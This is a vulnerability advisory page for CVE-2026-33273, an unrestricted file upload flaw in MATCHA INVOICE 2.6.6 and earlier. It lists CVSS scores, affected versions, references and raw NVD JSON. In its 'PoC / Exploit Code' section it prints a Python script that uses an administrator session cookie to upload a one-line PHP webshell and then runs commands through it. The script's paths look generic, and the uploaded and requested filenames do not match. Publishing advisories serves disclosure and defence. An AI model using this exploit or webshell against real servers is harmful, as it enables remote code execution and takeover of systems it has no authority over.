CVE-2026-33273

Description

Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:icz:matcha_invoice:*:*:*:*:*:*:*:* - VULNERABLE

MATCHA INVOICE <= 2.6.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://example.com/matcha_invoice/upload.php"
shell_url = "http://example.com/matcha_invoice/uploads/shell.php"

# Administrator session cookie (required due to PR:H)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Payload: A simple PHP webshell
# The application fails to validate the file type, allowing .php upload
files = {
    'file': ('evil.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream')
}

data = {
    'submit': 'Upload'
}

try:
    # Step 1: Upload the malicious file
    print("[*] Attempting to upload malicious file...")
    response = requests.post(target_url, files=files, data=data, cookies=cookies)
    
    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] File uploaded successfully!")
        
        # Step 2: Trigger the payload
        print("[*] Triggering the payload...")
        params = {'cmd': 'whoami'}
        exec_response = requests.get(shell_url, params=params)
        
        if exec_response.status_code == 200:
            print(f"[+] Command execution successful!")
            print(f"[+] Output: {exec_response.text}")
        else:
            print("[-] Failed to execute command.")
    else:
        print("[-] Upload failed.")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33273
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33273
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33273/
[4] VulDB https://vuldb.com/cve/CVE-2026-33273
[5] https://jvn.jp/en/jp/JVN33581068/
[6] https://oss.icz.co.jp/news/?p=1386

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33273", "sourceIdentifier": "[email protected]", "published": "2026-04-08T06:16:28.647", "lastModified": "2026-04-17T20:49:00.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted upload of file with dangerous type issue exists in MATCHA INVOICE 2.6.6 and earlier. If this vulnerability is exploited, an arbitrary file may be created by an administrator of the product. As a result, arbitrary code may be executed on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:icz:matcha_invoice:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.6.6", "matchCriteriaId": "4BF23003-709B-4C38-BD44-946DDD4D511C"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN33581068/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://oss.icz.co.jp/news/?p=1386", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}